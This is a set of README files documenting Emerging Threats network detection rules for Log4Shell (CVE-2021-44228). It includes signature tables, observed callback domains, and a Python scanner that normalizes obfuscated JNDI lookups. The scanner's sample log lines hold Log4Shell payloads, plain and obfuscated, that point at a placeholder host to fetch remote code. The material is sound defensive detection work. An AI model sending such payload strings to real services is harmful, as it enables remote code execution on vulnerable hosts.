├── README.md
└── detection_details
    ├── AttackStrings
    │   └── README.md
    ├── IIOP
    │   ├── README.md
    │   └── images
    │       ├── 2034730.png
    │       ├── 2034731.png
    │       └── iiop_request.png
    ├── Java_Class_Download
    │   ├── README.md
    │   └── images
    │       ├── 2014474.png
    │       ├── 2014475.png
    │       └── download.png
    ├── LDAP
    │   ├── README.md
    │   └── images
    │       ├── anon_ldap_with_payload.png
    │       ├── anon_ldap_with_payload_request.png
    │       ├── anon_ldap_with_payload_response.png
    │       ├── anon_ldap_with_payload_response_payload.png
    │       ├── anon_ldap_with_payload_response_payload2.png
    │       ├── ldap_javaClass.png
    │       ├── ldap_serialized_java.png
    │       ├── non-anon_ldap_request.png
    │       └── non-anon_ldap_response.png
    └── RMI
        ├── README.md
        └── images
            ├── 2034748.png
            ├── outbound_request.png
            └── traffic_example.png

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Overview

The exploitation of CVE-2021-44228 aka "[Log4Shell](https://twitter.com/GossiTheDog/status/1469252646745874435)"
produces many network artifacts across the various stages required for exploitation. Some methods of exploitation
can lead to Remote Code Execution (RCE), while other methods result in the disclosure of sensitive information.

The "path" to RCE is detailed in this most excellent graphic by GovCERT.ch:
![](https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/assets/log4j_attack.png)
Image Source: https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

This document details the various network based detection rules created by
[Emerging Threats](https://twitter.com/ET_Labs). It will be maintained as new detection rules are updated.

Please report any false positives or false negatives via [our feedback tool](https://feedback.emergingthreats.net/feedback).

## Download Directions
All rules listed here are [BSD Licensed](https://rules.emergingthreatspro.com/open/suricata-5.0/LICENSE) and can be
downloaded from rules.emergingthreatspro.com as per the [directions](https://rules.emergingthreatspro.com/OPEN_download_instructions.html).

As updates are still being applied, to ensure you receive the most recent revision of each rule, it is suggested to pull
the rules directly from the download servers.

# Exploit Attempts
While these signatures initially provided good coverage of inbound attempts, attackers quickly began obfuscating the
payload using an array of different methods, including:
- nested lookups
- built-in `lower` and `upper` functions
- hex/oct encoding
- Unicode characters
- "shorthand" notations

An excellent list of obfuscations and bypasses can be found via
[Puliczek/CVE-2021-44228-PoC-log4j-bypass-words](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words)

## Inbound Exploit Attempts
These signatures were created to detect inbound exploit attempts. Additional rules are being created to cover as many
obfuscation techniques as possible, though the vast array of techniques makes this difficult. Detection via
[Post Exploit Activity](#post-exploitation-activity) is a key part of a network based detection strategy.

### Inbound Signature Deployment Considerations
Inbound signatures are designed to be deployed "in front of" potentially vulnerable hosts. All rules have the
*destination* host variable set to `[$HOME_NET,$HTTP_SERVERS]`. In order for these rules to fire correctly, the
`$HOME_NET` and/or `$HTTP_SERVERS` variables _must_ be correctly defined within the IDS Engine's configuration.

<details>
<summary>Click to expand list of 48 Signatures</summary>

| sid | msg |
|---------|---|
| 2034647 | ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) |
| 2034648 | ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228) |
| 2034649 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) |
| 2034650 | ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228) |
| 2034651 | ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228) |
| 2034652 | ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228) |
| 2034653 | ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228) |
| 2034654 | ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228) |
| 2034655 | ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228) |
| 2034656 | ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228) |
| 2034657 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228) |
| 2034658 | ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228) |
| 2034659 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228) |
| 2034660 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228) |
| 2034661 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (CVE-2021-44228) |
| 2034662 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (CVE-2021-44228) |
| 2034663 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228) |
| 2034664 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (Outbound) (CVE-2021-44228) |
| 2034665 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228) |
| 2034666 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (udp) (CVE-2021-44228) |
| 2034667 | ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228) |
| 2034668 | ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228) |
| 2034671 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (CVE-2021-44228) |
| 2034672 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (udp) (CVE-2021-44228) |
| 2034673 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (CVE-2021-44228) |
| 2034674 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (CVE-2021-44228) |
| 2034676 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (CVE-2021-44228) |
| 2034699 | ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (CVE-2021-44228) |
| 2034700 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (CVE-2021-44228) |
| 2034701 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (CVE-2021-44228) |
| 2034702 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (tcp) (CVE-2021-44228) |
| 2034703 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (udp) (CVE-2021-44228) |
| 2034706 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (CVE-2021-44228) |
| 2034707 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (CVE-2021-44228) |
| 2034708 | ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (CVE-2021-44228) |
| 2034709 | ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (CVE-2021-44228) |
| 2034710 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (CVE-2021-44228) |
| 2034711 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (CVE-2021-44228) |
| 2034712 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (CVE-2021-44228) |
| 2034713 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (CVE-2021-44228) |
| 2034714 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (CVE-2021-44228) |
| 2034715 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (CVE-2021-44228) |
| 2034716 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (CVE-2021-44228) |
| 2034717 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (CVE-2021-44228) |
| 2034808 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228) |
| 2034809 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228) |
| 2034810 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228) |
| 2034811 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228) |

</details>

## Outbound Exploit Attempts
Due to the freedom offered in some network environments and the adoption of Log4Shell exploitation by Mirai and other
botnets, outbound detection has been provided in an attempt to identify systems attempting to exploit Log4Shell
vulnerabilities from within the "internal" network. These rules are generally the exact same as the inbound signatures
with the source host variable set to `$HOME_NET`.

### Outbound Signature Deployment Considerations
Outbound signatures are designed to be deployed in a position to alert on "internal" systems which are attempting to
exploit vulnerable hosts either on the internet *or* the "internal" network. All rules have the *source* host variable
set to `$HOME_NET` while the *destination* host variable is `any`.

In order for these rules to fire correctly, the `$HOME_NET` variable _must_ be correctly defined within the IDS
Engine's configuration.

<details>
<summary>Click to expand list of 43 Signatures</summary>

| sid | msg |
|---------|---|
| 2034750 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (Outbound) (CVE-2021-44228) |
| 2034751 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (Outbound) (CVE-2021-44228) |
| 2034758 | ET EXPLOIT Apache log4j RCE Attempt (http rmi) (Outbound) (CVE-2021-44228) |
| 2034759 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (Outbound) (CVE-2021-44228) |
| 2034760 | ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (Outbound) (CVE-2021-44228) |
| 2034761 | ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (Outbound) (CVE-2021-44228) |
| 2034762 | ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (Outbound) (CVE-2021-44228) |
| 2034763 | ET EXPLOIT Apache log4j RCE Attempt (udp dns) (Outbound) (CVE-2021-44228) |
| 2034764 | ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (Outbound) (CVE-2021-44228) |
| 2034765 | ET EXPLOIT Apache log4j RCE Attempt (http dns) (Outbound) (CVE-2021-44228) |
| 2034766 | ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (Outbound) (CVE-2021-44228) |
| 2034767 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (Outbound) (CVE-2021-44228) |
| 2034768 | ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (Outbound) (CVE-2021-44228) |
| 2034781 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (Outbound) (CVE-2021-44228) |
| 2034782 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (Outbound) (CVE-2021-44228) |
| 2034783 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (Outbound) (CVE-2021-44228) |
| 2034784 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (Outbound) (CVE-2021-44228) |
| 2034785 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (Outbound) (CVE-2021-44228) |
| 2034786 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (Outbound) (CVE-2021-44228) |
| 2034787 | ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (Outbound) (CVE-2021-44228) |
| 2034788 | ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (Outbound) (CVE-2021-44228) |
| 2034789 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (Outbound) (CVE-2021-44228) |
| 2034790 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (Outbound) (CVE-2021-44228) |
| 2034791 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (Outbound) (CVE-2021-44228) |
| 2034792 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (Outbound) (CVE-2021-44228) |
| 2034793 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (Outbound) (CVE-2021-44228) |
| 2034794 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (Outbound) (CVE-2021-44228) |
| 2034795 | ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (Outbound) (CVE-2021-44228) |
| 2034796 | ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (Outbound) (CVE-2021-44228) |
| 2034797 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (Outbound) (CVE-2021-44228) |
| 2034798 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (Outbound) (CVE-2021-44228) |
| 2034799 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (Outbound) (CVE-2021-44228) |
| 2034800 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (Outbound) (CVE-2021-44228) |
| 2034801 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (Outbound) (CVE-2021-44228) |
| 2034802 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (Outbound) (CVE-2021-44228) |
| 2034803 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (Outbound) (CVE-2021-44228) |
| 2034804 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (udp) (Outbound) (CVE-2021-44228) |
| 2034805 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (Outbound) (CVE-2021-44228) |
| 2034806 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (Outbound) (CVE-2021-44228) |
| 2034807 | ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (Outbound) (CVE-2021-44228) |
| 2034834 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (udp) (Outbound) (CVE-2021-44228) |
| 2034835 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (tcp) (Outbound) (CVE-2021-44228) |
| 2034836 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (Outbound) (CVE-2021-44228) |

</details>

# Post Exploitation Activity
While there are many methods of obfuscating the inbound/outbound attack strings, the resulting response traffic can
be gathered into a few different categories.

## DNS
One of the more popular attack strings does not deliver any Remote Code Execution (RCE) payload, but instead results in
exfiltration of sensitive system details via DNS queries.

It is not possible to provide a high degree of detection efficacy for log4j exploitation resulting in DNS exfiltration,
due to the dynamic nature of the exfiltrated details and the large number of "receiving" DNS servers.

DNS exfiltration is detailed via screenshots in
[Zander Work's Twitter Thread](https://twitter.com/captainGeech42/status/1470055184449613829)

### Commonly Observed Callback Domains
There are some commonly used services being observed that are utilized in order to "catch" the exfiltrated data.

Emerging Threats has created the following detections for commonly used Payload and C2 domains.

| sid | msg |
|---------|---|
| 2034198 | ET INFO Interactsh Domain in DNS Lookup (.interact .sh) |
| 2034200 | ET MALWARE Interactsh CnC Activity |
| 2034201 | ET MALWARE Interactsh Control Panel (DNS) |
| 2034732 | ET INFO Interactsh Domain in DNS Lookup (.interactsh .com) |
| 2034669 | ET POLICY dnslog .cn Observed in DNS Query |
| 2034670 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (bindsearchlib .com) |
| 2034747 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (rce .ee) |
| 2034819 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4j .binaryedge .io) |
| 2034820 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4shell .huntress .com) |
| 2034821 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (kryptoslogic-cve-2021-44228 .com) |
| 2034832 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (.l4j .canarytokens .com) |
| 2034822 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (ceye .io) |
| 2034823 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (oob .li) |
| 2034824 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (pwn .af) |
| 2034825 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (notburpcollaborator .net) |
| 2034826 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scannermcscanface-edgescan .com) |
| 2034827 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (service .exfil .site) |
| 2034828 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scanworld .net) |
| 2034829 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (dns .cyberwar .nl) |
| 2034830 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (log .exposedbotnets .ru) |
| 2034831 | ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (leakix .net) |

## LDAP

Detailed LDAP detection including screenshots of alerting traffic can be found in the
[LDAP Detection Details](detection_details/LDAP/README.md). These rules are designed to alert on the connection to and
response from "malicious LDAP" servers.

| sid | msg | Notes |
|---------|---|---|
| 2034704 | ET POLICY Anonymous LDAPv3 Bind Request Outbound | sets flowbit |
| 2034705 | ET POLICY Successful Anonymous LDAPv3 Bind Request Outbound | depends on `2034704` |
| 2034722 | ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response | |
| 2034769 | ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2 | |
| 2034770 | ET POLICY JavaClass Returned Via Anonymous Outbound LDAPv3 Bind Request | depends on `2034704` |
| 2034812 | ET POLICY Non-Anonymous LDAPv3 Bind Request Outbound | sets flowbit |
| 2034771 | ET POLICY Successful Non-Anonymous LDAPv3 Bind Request Outbound | depends on `2034812` |
| 2034772 | ET POLICY JavaClass Returned Via Non-Anonymous Outbound LDAPv3 Bind Request | depends on `2034812` |
| 2034818 | ET POLICY Serialized Java Object returned via LDAPv3 Response | |

## LDAPS

Due to the nature of LDAPS, payload detection is not feasible. However, signatures have been created for the use of
LDAPS with external networks.

| sid | msg | Notes |
|---------|---|---|
| 2034719 | ET POLICY LDAPSv3 LDAPS_START_TLS Request Outbound | sets flowbit |
| 2034720 | ET POLICY Successful LDAPSv3 LDAPS_START_TLS Request Outbound | depends on `2034720` |
| 2034721 | ET POLICY Successful LDAPSv3 LDAPS_START_TLS Request Outbound | depends on `2034720` |

## Java Class Download
These signatures, which have existed for several years, alert on Java downloading additional Class files or Serialized
data from a webserver. This method was observed during the initial use of the `jndi:ldap://` attack string, which would
result in the fetching of a Java payload via HTTP/HTTPS.

Details of this detection method can be found in the [Java Payloads Detection Details](detection_details/Java_Class_Download/README.md).

| sid | msg | Notes |
|---------|---|---|
| 2013035 | ET POLICY Java Client HTTP Request | sets flowbit for `Java/` User Agent |
| 2014474 | ET INFO JAVA - Java Class Download | depends on `2013035` |
| 2014475 | ET INFO JAVA - Java Class Download By Vulnerable Client | See list below for flowbit set rules |
| 2016502 | ET INFO Java Serialized Data via vulnerable client | See list below for flowbit set rules |
| 2016503 | ET INFO Java Serialized Data | depends on `2013035` |

### Signatures which determine "Vulnerable Client"
This class of signatures is designed to detect a client that is not using the latest version of a Java "branch".

| sid | msg |
|---------|---|
| 2011581 | ET POLICY Vulnerable Java Version 1.5.x Detected |
| 2011582 | ET POLICY Vulnerable Java Version 1.6.x Detected |
| 2011584 | ET POLICY Vulnerable Java Version 1.4.x Detected |
| 2014297 | ET POLICY Vulnerable Java Version 1.7.x Detected |
| 2019401 | ET POLICY Vulnerable Java Version 1.8.x Detected |
| 2025314 | ET POLICY Vulnerable Java Version 9.0.x Detected |
| 2025518 | ET POLICY Vulnerable Java Version 10.0.x Detected |
| 2028867 | ET POLICY Vulnerable Java Version 11.0.x Detected |
| 2028868 | ET POLICY Vulnerable Java Version 12.0.x Detected |
| 2028869 | ET POLICY Vulnerable Java Version 13.0.x Detected |
| 2034814 | ET POLICY Vulnerable Java Version 14.0.x Detected |
| 2034815 | ET POLICY Vulnerable Java Version 15.0.x Detected |
| 2034816 | ET POLICY Vulnerable Java Version 16.0.x Detected |
| 2034817 | ET POLICY Vulnerable Java Version 17.0.x Detected |

## RMI
Detailed RMI detection including screenshots of alerting traffic can be found in the
[RMI Detection Details](detection_details/RMI/README.md).

| sid | msg | Notes |
|---------|---|---|
| 2034718 | ET POLICY RMI Request Outbound | sets flowbit |
| 2034748 | ET POLICY Serialized Java Payload via RMI Response | depends on `2034718` |
| 2034749 | ET POLICY Unserialized Java Payload via RMI Response | depends on `2034718` |

## IIOP
Detailed IIOP detection including screenshots of alerting traffic can be found in the
[IIOP Detection Details](detection_details/IIOP/README.md).

| sid | msg | Notes |
|---------|---|---|
| 2034730 | ET POLICY GIOP/IIOP Request Outbound | sets flowbit |
| 2034731 | ET POLICY Successful GIOP/IIOP Request Outbound | depends on `2034730` |

# Special Thanks
Emerging Threats would like to thank the following contributors for their efforts:

For the initial environments for testing
- [Try Hack Me](https://twitter.com/RealTryHackMe)
- [John Hammond](https://twitter.com/_JohnHammond)

For providing pcaps for signature creation
- [SLASH30Miata](https://twitter.com/SLASH30Miata)
- Juniper Threat Labs
- [GreyNoise](https://twitter.com/GreyNoiseIO)
- [Cloudshark](https://www.cloudshark.org/captures/fe73350d9a3d)

For tools and directions used in testing environments
- [vulhub](https://github.com/vulhub/vulhub/blob/ab2cbc517fcabaaf0c8f07a03b7947b795c8dc9a/log4j/CVE-2021-44228/README.md)
- [Veracode](https://github.com/veracode-research/rogue-jndi/)
- [lhotari](https://github.com/lhotari/log4shell-mitigation-tester#exploiting-with-rogue-jndi)
- [0xJDow](https://github.com/0xJDow/rogue-rmi-server)
- [christophetd](https://github.com/christophetd/log4shell-vulnerable-app)

For having awesome details which were referenced
- [Puliczek](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words)
- [captainGeech42](https://twitter.com/captainGeech42/)
- [GovCERT.ch](https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/#)

--------------------------------------------------------------------------------
/detection_details/AttackStrings/README.md:
--------------------------------------------------------------------------------
# Attack String Detection

## Protocol detection strings

These signatures are designed to detect the attack strings for the various JNDI supported network services:

| Inbound SID | Outbound SID | msg |
|-------------|--------------|---|
| 2034647 | | ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) |
| 2034649 | 2034759 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) |
| 2034651 | 2034761 | ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228) |
| 2034656 | 2034766 | ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228) |
| 2034657 | 2034767 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228) |
| 2034658 | 2034768 | ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228) |
| 2034648 | 2034758 | ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228) |
| 2034650 | 2034760 | ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228) |
| 2034652 | 2034762 | ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228) |
| 2034653 | 2034763 | ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228) |
| 2034654 | 2034764 | ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228) |
| 2034655 | 2034765 | ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228) |
| 2034667 | 2034788 | ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228) |
| 2034668 | 2034787 | ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228) |
| 2034714 | 2034790 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (CVE-2021-44228) |
| 2034715 | 2034789 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (CVE-2021-44228) |
| 2034712 | 2034792 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (CVE-2021-44228) |
| 2034713 | 2034791 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (CVE-2021-44228) |
| 2034710 | 2034794 | ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (CVE-2021-44228) |
| 2034711 | 2034793 | ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (CVE-2021-44228) |

## Bypass and Obfuscation Detection

| Inbound SID | Outbound SID | msg | Notes |
|-------------|--------------|---|---|
| 2034659 | 2034781 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228) | |
| 2034660 | 2034782 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228) | |
| 2034700 | 2034800 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (CVE-2021-44228) | |
| 2034701 | 2034799 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (CVE-2021-44228) | |
| 2034702 | 2034835 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (tcp) (CVE-2021-44228) | Disabled |
| 2034703 | 2034834 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (udp) (CVE-2021-44228) | Disabled |
| 2034716 | 2034751 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (CVE-2021-44228) | |
| 2034717 | 2034750 | ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (CVE-2021-44228) | |
| 2034673 | 2034786 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (CVE-2021-44228) | |
| 2034674 | 2034805 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (CVE-2021-44228) | |
| 2034671 | 2034836 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (CVE-2021-44228) | Disabled |
| 2034672 | 2034804 | ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (udp) (CVE-2021-44228) | Disabled |
| 2034676 | 2034806 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (CVE-2021-44228) | |

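The bypass forms the main README lists (nested lookups, the `lower`/`upper` functions, "shorthand" default notation, URL-encoded characters) and the lower/upper and nested signatures above all collapse to the same `${jndi:...}` string once the lookups are resolved. The following is an added example, not code from the Emerging Threats repository, of a defender-side log scanner that performs that normalization before matching; the sample access-log lines, addresses and the `max_rounds` limit are constructed for the example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# An innermost lookup: "${...}" whose body contains no further "${" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What every bypass form collapses to once normalized. Log4j resolves lookup
# prefixes case-insensitively, so the match is case-insensitive too.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Emulate the lookup forms the bypass signatures are built around:
    ${lower:x}, ${upper:x}, and the ${key:-default} fallback (the "shorthand"
    ${::-x} is that fallback with an empty key). Anything else is left alone."""
    prefix, sep, rest = body.partition(":")
    key = prefix.strip().lower()
    if sep and key == "lower":
        return rest.lower()
    if sep and key == "upper":
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(value: str, max_rounds: int = 20) -> str:
    """URL-decode, then repeatedly resolve innermost lookups until nothing changes.
    max_rounds (constructed limit) bounds the work adversarially deep nesting can
    cause; lookups not emulated here (e.g. ${date:...}) simply remain in the output."""
    text = unquote(value)

    def repl(match) -> str:
        resolved = _resolve(match.group(1))
        return match.group(0) if resolved is None else resolved

    for _ in range(max_rounds):
        new_text = _INNERMOST.sub(repl, text)
        if new_text == text:
            break
        text = new_text
    return text


def is_jndi_lookup(value: str) -> bool:
    """True if the value, once de-obfuscated, carries a ${jndi:...} lookup."""
    return _JNDI.search(normalize(value)) is not None


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, normalized_line) for every line that is a JNDI lookup
    after normalization; the normalized text is what an analyst should pivot on."""
    hits = []
    for number, line in enumerate(lines, start=1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((number, norm))
    return hits


# Constructed access-log lines (documentation-range addresses), one per bypass form.
SAMPLE_LOG = [
    '198.51.100.7 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '198.51.100.8 - - "GET /?x=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 200 "-" "curl/7.79"',
    '198.51.100.9 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/a}"',
    '198.51.100.10 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.9:1389/a}"',
    '198.51.100.11 - - "GET /?q=%24%7B%24%7Bupper%3Aj%7Dndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fa%7D HTTP/1.1" 404 "-" "-"',
    '198.51.100.12 - - "GET / HTTP/1.1" 200 "-" "${date:yyyy} ${env:HOME} benign lookup text"',
]

if __name__ == "__main__":
    for number, norm in scan_log_lines(SAMPLE_LOG):
        print(f"line {number}: {norm}")
```

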